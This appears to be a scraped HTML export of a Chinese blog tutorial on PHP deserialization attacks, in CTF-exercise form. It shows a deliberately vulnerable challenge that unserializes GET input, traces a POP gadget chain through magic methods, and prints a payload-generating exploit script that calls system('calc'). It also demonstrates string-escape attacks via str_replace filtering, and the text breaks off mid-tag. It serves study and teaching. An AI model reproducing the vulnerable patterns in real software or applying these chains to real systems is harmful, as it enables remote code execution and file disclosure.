data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-51-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-51-1024x576.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-51-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-81\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"kIfZu\">\u4f8b\u98984<\/h4>\n\n\n\n<p id=\"u60575a26\">\u518d\u6765\u770b\u4e00\u9898<\/p>\n\n\n\n<pre id=\"AgjIA\" class=\"wp-block-code\"><code>&lt;?php\n\/\/flag is in flag.php\nhighlight_file(__FILE__);\nerror_reporting(0);\nclass Modifier {\n    private $var;\n    public function append($value)\n    {\n        include($value);\n        echo $flag;\n    }\n    public function 
__invoke(){\n        $this-&gt;append($this-&gt;var);\n    }\n}\n\nclass Show{\n    public $source;\n    public $str;\n    public function __toString(){\n        return $this-&gt;str-&gt;source;\n    }\n    public function __wakeup(){\n        echo $this-&gt;source;\n    }\n}\n\nclass Test{\n    public $p;\n    public function __construct(){\n        $this-&gt;p = array();\n    }\n\n    public function __get($key){\n        $function = $this-&gt;p;\n        return $function();\n    }\n}\n\nif(isset($_GET&#91;'pop'])){\n    unserialize($_GET&#91;'pop']);\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p id=\"u2e5e6a94\">\u770b\u4e86\u4e00\u4e0b\u4ee3\u7801\uff0c\u6211\u4eec\u7ed3\u5408\u6ce8\u91ca\u5f97\u77e5\u6700\u7ec8\u9700\u8981\u6267\u884cModifier::append(&#8220;flag.php&#8221;)<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-52.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"621\" height=\"350\" data-attachment-id=\"82\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=82\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-52.png\" data-orig-size=\"621,350\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" 
data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-52-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-52.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-52.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-82\"  sizes=\"auto, (max-width: 621px) 100vw, 621px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u1ded9f1f\">\u6267\u884cappend\u9700\u8981\u8c03\u7528Modifier\u5bf9\u8c61\u7684__invoke()\u65b9\u6cd5<\/p>\n\n\n\n<p id=\"u014ad462\">__invoke\u7684\u89e6\u53d1\u6761\u4ef6\u662f\u5bf9\u8c61\u5f53\u4f5c\u51fd\u6570\u8c03\u7528<\/p>\n\n\n\n<p id=\"u46045883\">\u4e8e\u662f\u6211\u4eec\u53ef\u4ee5\u628aModifier\u5bf9\u8c61\u5f53\u4f5c\u51fd\u6570\u8c03\u7528<\/p>\n\n\n\n<p id=\"ufcc1d140\">\u90a3\u4e48\u95ee\u9898\u53c8\u6765\u4e86\u3002\u600e\u4e48\u628a\u5bf9\u8c61\u5f53\u51fd\u6570\u8c03\u7528\uff1f<\/p>\n\n\n\n<p id=\"u5a289c37\">Test\u7c7b\u7684__get()\u65b9\u6cd5\u4f1a\u6267\u884c$function = $this-&gt;p; \u63a5\u7740 return $function(); \u628a\u5b83\u5f53\u4f5c\u51fd\u6570\u8c03\u7528<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-53.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"505\" height=\"175\" data-attachment-id=\"83\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=83\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-53.png\" data-orig-size=\"505,175\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-53-300x104.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-53.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-53.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-83\"  sizes=\"auto, (max-width: 505px) 100vw, 505px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u398164e5\">\u90a3\u600e\u4e48\u89e6\u53d1Test\u7684__get?<\/p>\n\n\n\n<p id=\"u7f712a8e\">\u6211\u4eec\u9700\u8981\u8bbf\u95eeTest\u5bf9\u8c61\u4e0d\u5b58\u5728\u7684\u5c5e\u6027<\/p>\n\n\n\n<p id=\"ua04bbe86\">\u90a3\u8c01\u8bbf\u95eeTest\u7684\u5c5e\u6027\u5462\uff1f<\/p>\n\n\n\n<p id=\"u0172326c\">Show\u7c7b\u7684__toString()\u4f1a\u8bbf\u95ee$this-&gt;str-&gt;source<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-54.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"605\" height=\"143\" data-attachment-id=\"84\" 
data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=84\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-54.png\" data-orig-size=\"605,143\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-54-300x71.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-54.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-54.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-84\"  sizes=\"auto, (max-width: 605px) 100vw, 605px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u483b3174\">\u600e\u4e48\u89e6\u53d1Show\u7684__toString\uff1f<\/p>\n\n\n\n<p id=\"u18afdb05\">\u9700\u8981\u628aShow\u5bf9\u8c61\u5f53\u4f5c\u5b57\u7b26\u4e32<\/p>\n\n\n\n<p id=\"u267f25f2\">\u8c01\u4f1a\u628aShow\u5f53\u5b57\u7b26\u4e32\uff1f<\/p>\n\n\n\n<p id=\"ua482c7d0\">Show\u7684__wakeup()\u4f1aecho $this-&gt;source<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-55.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"470\" height=\"136\" data-attachment-id=\"85\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=85\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-55.png\" data-orig-size=\"470,136\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-55-300x87.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-55.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-55.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-85\"  sizes=\"auto, (max-width: 470px) 100vw, 470px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uc1b54770\">\u6211\u4eec\u901a\u8fc7\u53cd\u63a8\u6cd5\u5f97\u5230pop\u94fe<\/p>\n\n\n\n<pre id=\"nKAFg\" class=\"wp-block-code\"><code>Show::__wakeup() \u2192 echo $source(Show\u5bf9\u8c61) \n\u2192 Show::__toString() \u2192 \u8bbf\u95ee $str(Test\u5bf9\u8c61)-&gt;source \n\u2192 Test::__get() \u2192 $p(Modifier\u5bf9\u8c61)() \n\u2192 Modifier::__invoke() \u2192 append($var) \u2192 include(\"flag.php\")<\/code><\/pre>\n\n\n\n<p 
id=\"u09e6ec18\">\u63a5\u4e0b\u6765\u5c31\u662f\u6784\u9020\u51faexp<\/p>\n\n\n\n<pre id=\"RxHlu\" class=\"wp-block-code\"><code>&lt;?php\n\/\/flag is in flag.php\nclass Modifier {\n    private $var='flag.php';\n    public function append($value)\n    {\n        system(\"calc\");\n    }\n    public function __invoke(){\n        $this-&gt;append($this-&gt;var);\n        echo \"\u89e6\u53d1\u4e86__invoke\";\n    }\n}\n\nclass Show{\n    public $source;\n    public $str;\n    public function __toString(){\n        $this-&gt;str-&gt;source;\n        echo \"\u89e6\u53d1\u4e86__toString\";\n    }\n    public function __wakeup(){\n        echo $this-&gt;source;\n        echo \"\u89e6\u53d1\u4e86__wakeup\";\n    }\n}\n\nclass Test{\n    public $p;\n    public function __construct(){\n        $this-&gt;p = array();\n        echo \"\u89e6\u53d1\u4e86__construct\".PHP_EOL;\n    }\n\n    public function __get($key){\n        $function = $this-&gt;p;\n        echo \"\u89e6\u53d1\u4e86__get\";\n    }\n}\n\n\/\/ if(isset($_GET&#91;'pop'])){\n\/\/     unserialize($_GET&#91;'pop']);\n\/\/ }\n\n$modifier = new Modifier();\n\n\n$test = new Test();\n$test-&gt;p = $modifier;\n\n\n$show2 = new Show();\n$show2-&gt;str = $test;  \n\n\n$show1 = new Show();\n$show1-&gt;source = $show2; \n\n$payload = serialize($show1);\necho urlencode($payload);\n?&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-56-1024x549.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"549\" data-attachment-id=\"86\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=86\" 
data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-56.png\" data-orig-size=\"1919,1029\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-56-300x161.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-56-1024x549.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-56-1024x549.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-86\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"H4Iz7\">\u53cd\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u9003\u9038<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"NSZDH\">php\u53cd\u5e8f\u5217\u5316\u7279\u6027<\/h4>\n\n\n\n<p id=\"u794a0203\">1.php\u5728\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u5e95\u5c42\u4ee3\u7801\u662f\u4ee5;\u4f5c\u4e3a\u5b57\u6bb5\u7684\u5206\u9694\uff0c\u4ee5}\u4f5c\u4e3a\u7ed3\u5c3e\uff0c\u5e76\u4e14\u662f\u6839\u636e\u957f\u5ea6\u5224\u65ad\u5185\u5bb9 \uff0c\u540c\u65f6\u53cd\u5e8f\u5217\u5316\u7684\u8fc7\u7a0b\u4e2d\u5fc5\u987b\u4e25\u683c\u6309\u7167\u5e8f\u5217\u5316\u89c4\u5219\u624d\u80fd\u6210\u529f\u5b9e\u73b0\u53cd\u5e8f\u5217\u5316<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' 
data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-57-1024x680.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"680\" data-attachment-id=\"87\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=87\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-57.png\" data-orig-size=\"1385,920\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-57-300x199.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-57-1024x680.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-57-1024x680.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-87\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u1353ddf5\">2.\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u683c\u5f0f\uff1a\u7c7b\u578b:\u957f\u5ea6:&#8221;\u5185\u5bb9&#8221; \uff0c\u5f53\u5e8f\u5217\u5316\u7684\u957f\u5ea6\u4e0d\u5bf9\u5e94\u7684\u65f6\u5019\u4f1a\u51fa\u73b0\u62a5\u9519<\/p>\n\n\n\n<figure 
class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-58-1024x622.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"622\" data-attachment-id=\"88\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=88\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-58.png\" data-orig-size=\"1389,844\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-58-300x182.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-58-1024x622.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-58-1024x622.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-88\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u3cb85daf\">3.\u53ef\u4ee5\u53cd\u5e8f\u5217\u5316\u7c7b\u4e2d\u4e0d\u5b58\u5728\u7684\u5143\u7d20<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-59-1024x737.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"737\" data-attachment-id=\"89\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=89\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-59.png\" data-orig-size=\"1361,980\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-59-300x216.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-59-1024x737.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-59-1024x737.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-89\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p 
id=\"u4de2d909\">\u800c\u5b57\u7b26\u4e32\u9003\u9038\u5c31\u662f\u5728\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u88ab\u53cd\u5e8f\u5217\u5316\u4e4b\u524d\uff0c\u7531\u4e8e\u7ecf\u8fc7\u4e86\u66ff\u6362\u51fd\u6570\uff08\u6bd4\u5982 str_replace\uff0cpreg_replace\uff0caddslashes\uff0chtmlspecialchars\uff09\u7684\u5904\u7406\uff0c\u5bfc\u81f4\u5b57\u7b26\u4e32\u7684\u5b9e\u9645\u957f\u5ea6\u4e0e\u5e8f\u5217\u5316\u6570\u636e\u4e2d\u8bb0\u5f55\u7684\u957f\u5ea6\u4e0d\u4e00\u81f4\uff0c\u4ece\u800c\u4f7f\u653b\u51fb\u8005\u80fd\u591f\u901a\u8fc7\u7cbe\u5fc3\u6784\u9020\u7684 Payload \u63a7\u5236\u53cd\u5e8f\u5217\u5316\u540e\u7684\u5bf9\u8c61\u7ed3\u6784\u3002\u95ee\u9898\u7684\u6839\u6e90\u5728\u4e8e\u8fc7\u6ee4\u4f5c\u7528\u5728 serialize() \u7684\u8f93\u51fa\u4e0a\uff0c\u800c\u4e0d\u662f\u5e8f\u5217\u5316\u4e4b\u524d\u7684\u539f\u59cb\u503c\u4e0a\uff1b\u628a\u8fc7\u6ee4\u653e\u5230\u5e8f\u5217\u5316\u4e4b\u524d\uff0c\u957f\u5ea6\u5b57\u6bb5\u5c31\u4f1a\u4e0e\u5185\u5bb9\u4fdd\u6301\u4e00\u81f4<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"ERWVp\">\u5b57\u7b26\u4e32\u51cf\u5c11<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"rJM9y\">\u5b57\u7b26\u4e32\u51cf\u5c11\u793a\u4f8b\u4ee3\u7801<\/h5>\n\n\n\n<pre id=\"iAULH\" class=\"wp-block-code\"><code>&lt;?php\nhighlight_file(__FILE__);\nerror_reporting(0);\nclass A{\n    public $v1 = \"abcsystem()system()system()\";\n    public $v2 = '123';\n\n    public function __construct($arga,$argc){\n            $this-&gt;v1 = $arga;\n            $this-&gt;v2 = $argc;\n    }\n}\n$a = $_GET&#91;'v1'];\n$b = $_GET&#91;'v2'];\n$data = serialize(new A($a,$b));\n$data = str_replace(\"system()\",\"\",$data);\nvar_dump(unserialize($data));\n?&gt;<\/code><\/pre>\n\n\n\n<p id=\"u596168d0\">\u770b\u5230\u8fd9\u6bb5\u6f14\u793a\u4ee3\u7801\uff0c\u9996\u5148\u5728\u7b2c15\u884c\u7684\u65f6\u5019\uff0c\u4f1a\u8fdb\u884cserialize\uff0c\u8fd9\u4e2a\u65f6\u5019\u5c31\u4f1a\u786e\u5b9a\u597d\u5b57\u7b26\u4e32\u7ed3\u6784<\/p>\n\n\n\n<p id=\"u0f37fbb3\">\u7136\u540e str_replace() \u5c06 system()[8\u4e2a\u5b57\u7b26]\u66ff\u6362\u4e3a\u7a7a\u5b57\u7b26\u4e32[0\u4e2a\u5b57\u7b26] \u8fd9\u4e2a\u65f6\u5019\u5185\u5bb9\u4f1a\u53d8\u77ed\uff0c\u4f46\u662f\u53cd\u5e8f\u5217\u5316\u7ed3\u6784<\/p>\n\n\n\n<p id=\"u412da5ad\">\u7c7b\u578b:\u957f\u5ea6:&quot;\u5185\u5bb9&quot;<\/p>\n\n\n\n<p 
